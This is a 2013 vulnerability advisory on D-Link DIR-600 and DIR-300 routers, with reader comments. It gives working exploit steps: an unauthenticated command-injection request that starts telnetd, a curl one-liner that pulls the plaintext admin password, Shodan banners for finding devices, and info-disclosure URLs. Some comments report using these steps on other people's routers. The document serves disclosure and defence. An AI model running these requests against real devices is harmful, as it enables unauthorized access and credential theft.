no one is safe ...

Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)

Device Name: DIR-600 / DIR 300 - HW rev B1
Vendor: D-Link

============ Vulnerable Firmware Releases - DIR-300: ============

Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012

============ Vulnerable Firmware Releases - DIR-600: ============

Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013

============ Device Description: ============

D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.

Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...

============ Shodan Torks ============

Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600

============ Vulnerability Overview: ============

  • OS Command Injection (unauthenticated)

=> Parameter cmd

The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.
It is possible to start a telnetd to compromise the device.

WARNING: You do not need to be authenticated to the device!


starting a telnet server:

Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length:
15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.

For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*

Nmap Scan after starting the telnetd:
Nmap scan report for 192.168.178.222
Host is up (0.022s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE VERSION
1/tcp     filtered tcpmux
23/tcp    open     telnet  BusyBox telnetd 1.14.1 <<==!!!
<snip>


  • Information disclosure:

Nice server banner to detect this type of devices easily:

Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12

  • For changing the current password there is no request to the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

  • Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:

# cat var/passwd
"admin" "test" "0"

Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue:
http://en.securitylab.ru/lab/PT-2011-30
With the current version of the firmware the passwords are stored again in plaintext.

If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
root@bt:~#

  • Information Disclosure:

Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.

Request:

http://Target-IP/DevInfo.txt

or try to access version.txt and have a look at the html source ;)

Response:

HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

These details are available without authentication.

  • Local path disclosure

Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.

Request:

http://<IP>/router_info.xml

Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Date: Sat, 01 Jan 2000 21:22:43 GMT
Content-Type: text/xml
Content-Length: 49

EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)

  • Stored XSS via WLAN Assistent and Version Details

Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.

=> Parameter: SSID

The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)

http://Target-IP/version.txt

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/m1adv2013-003
Video: http://www.s3cur1ty.de/home-network-horror-days

============ Time Line: ============

14.12.2012 - discovered vulnerability
14.12.2012 - contacted dlink with the new vulnerability details via webinterface
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D'Link
21.12.2012 - D'link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D'Link responded that this is a security problem from the user and/or browser and they will not provide a fix. Quite interesting but ok ...
25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better
04.02.2013 - no more responses from D'Link, public release

===================== Advisory end =====================

Comments

Any idea how to make it in

Any idea how to make it in 2.10? command.php is not found
404 Not Found

2.10 Vulnerability

Does anyone know how can I do this vulnerability for a DIR-600 with firmware 2.10?

newbie question

im really noob in the subject, but, how can i recover the password of DIR 600? I already tried all defaults passwords but I think my brother changed it, the problem he's traveling, the modem in his room and its closed and i think somebody is stealing my connection. ty

D-link router_info.xml (and other interesting things)

Someone has shared a link with more stuff around the information disclosure vulnerability. I can't remember who has sent me the link ... but thx a lot :)

http://www.shulerent.com/2011/04/02/d-link-router_info-xml-and-other-int...

have phun
mIke

x

Can it be used via CSRF (img src=command.php?cmd=xxx or AJAX)?
If yes, one could open telnet on WAN interface.

telnetd is running by default

so there is no need to start it ....

see my comment below

Re: telnetd is running by default

It is just one example of what you can do without authentication. It looks like the started telnetd depends on the exact firmware version. On my system it was not started out of the box.

Best,
mIke

telnetd in dir-600 fw 2.15DE

I got this via try and error and I also decompressed the latest firmware image:

busybox init starts etc/init.d/rcS starts /etc/init0.d/rcS starts /etc/init0.d/S80telnetd.sh

always.

Can't post any code, ur system says:
"We have detected malicious input and blocked your attempt."


md5sum DIR-600_fw_revb5_215b01_ALL_de_20130206.zip
bd9e98fcc45d511e11863d16b7b2a433

md5sum DIR-600_fw_revb5_215b01_ALL_de_20130206/DIR600B5_FW215WWb01.bin
d482c521cfb9d3384598f1b30cf7e4d

Re: telnetd in dir-600 fw 2.15DE

thx for your info. I have not checked the 2.15 but the telnet backdoor is in lots of dlink devices included.

Best,
mIke

telnetd backdoor

The telnetd was already running on my DIR-600 device.

After the fw update v2.15, the telnetd is still started with a hardcoded login.

Even with the latest firmware it is very easy to get in.

There seems no way to disable this via the web interface.

Interesting..

I found a similar exploit for D-Link's DAP-1350, which is OEM Cameo. The same Ralink firmware is used by a handful of other vendors.. including Netgear and Trendet.

Considering vendors are often unwilling to fix these "user and/or browser" exploits, or even respond to emails.. more people will become interested in projects like openwrt and/or zrouter.

http://devio.us/~brynet/DAP-1350_exploit.txt

Firmware Rev. A 1.05 is also affected

Checked with Linux.
Searched a second at google and a min. later I had running a telnet server on the host without need any password.
Install a secure firewall on Layer 7 will help I guess:
http://www.ranum.com/security/computer_security/index.html

BR
ITBungler

Version 2.11

Hello,

it seems to work on a DLink Dir 300 Ver . 2.11 too.

I was able to get the admin password from a friends router through the
"plaintext credential vulnerability with the unauthenticated os command injection" and logged in successfully to the webinterface which was reachable over the internet ... !

cant believe this ...

Have a nice day

what about the other DIR-6##?

Is only the DIR-600 vulnerable or also the other DIR-6## (DIR-615, DIR-625 and DIR-635)?

Re: what about the other DIR-6##?

stay tuned ... I will release some more vulns like this

Similar exploit in DIR-685

I thought you might be interested in a similar vulnerability I found in the DIR-685 and wrote about in the October 2011 issue of Linux Journal and gave a talk on here: http://greenfly.org/talks/security/practice_hacking.html

The main difference is in my case the page is tools_vct.php and the variable is 'exeshell' but you can run telnetd as root all the same.

Re: Similar exploit in DIR-685

very cool ... but I think you need to be authenticated?!?

I think I have detected the same vuln in other devices of dlink ... cool to see this also in some more (broken) devices. I will publish this stuff soon ...

btw. cool work :)

Can't reproduce with DIR-300

Can't reproduce with DIR-300 running firmware 2.04, hardware revision B1 and the device is saying that no newer firmware version is available. Response is just a 404.

Re: Can't reproduce with DIR-300

This is because the automatic firmware check is broken ;) You have to update your router manually ...

btw. 404 is good :)

Gut, dass ich die nach dem PS Event in HBN rausgeworfen habe.

Hi,

nach eurer Demo in Heilbronn hatte ich die schon rausgworfen und gegen Netgear ersetzt. Aber ob die besser sind?

(Und sogar Heise spricht drüber ;-) )

Sehr schön gemacht.

Gruß
Christian G. (aus Hamburg)

uid Cookie

Your request contained a Cookie named uid containing some random string. Is this value required or some kind of authentication?

Re: uid

you do not need this Cookie :)

After executing I get this

After executing I get this :

HTTP/1.1 404 Not Found
Server: Linux, HTTP/1.1, DIR-600 Ver 2.10
Date: Wed, 06 Feb 2013 19:05:28 GMT
Content-Type: text/html
Content-Length: 110
Connection: close

404 Not Found
404 Not Found
The resource requested could not be found on this server.

Does that mean I am not vulnerable or just I did something wrong ?

Re: After executing I get this

so you are not vulnerable for this attack

exploit

is there any exploit to work on 2.10 fw? I also have this and I get the same response!

fw 2.10

But this ver. not has any bug?

nice

and without metasploit ;)

greetings

mr_insecure

Metasploit Module is coming

coming soon ... stay tuned ;)

DOS

Hallo Herr Messner,

als Ergänzung kann ich noch sagen, dass ich vor einigen Monaten durch simples fuzzing innerhalb von Sekunden den http Daemon auf einem DIR300 abschießen konnte. Leider weiß ich jetzt auf Anhieb nicht mehr die Firmware Version usw. bei Interesse kann ich das aber gerne nochmal aufbereiten.

MFG
M.Bilal

Re: DOS

Das kann ich mir gut vorstellen. Weitere Informationen wären an dieser Stelle sicherlich spannend.

vg

what about hardware version A1 dir-300

is it save to use the dir-300 with

hardware version A1 and with firmware 1.05 ??

thanks

setmo

Re: what about hardware version A1 dir-300

within the next few days we are also going to release vulnerabilities in HW rev A

stay tuned

Re: what about hardware version A1 dir-300

D'Link is now talking with me and is on the way to fix the reported vulns. In the mean time I will not release more D'Link vulnerabilities ...

The same in fw 2.06 on DIR-300

Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are also available (without any authentication) on Firmware External Version: V2.06 Firmware Internal Version: c61n Model Name: DIR-300 Hardware Version: B1. Greets from Poland

RE:

Check out this site for HW rev_A and FW 1.05 and below:
http://www.securityfocus.com/archive/1/514687/30/120/threaded

WLAN password

The same trick allows to directly obtain the WLAN password (DIR-300, Rev A):
http://192.168.XXX.1/bsc_wlan.php?NO_NEED_AUTH=1
immediately shows the password in plain text. No authentication required.

Re: WLAN password

Thx to Craig I think this vulnerability is quite a while around the net:
http://www.devttys0.com/2010/12/multiple-d-link-router-vulnerabilities/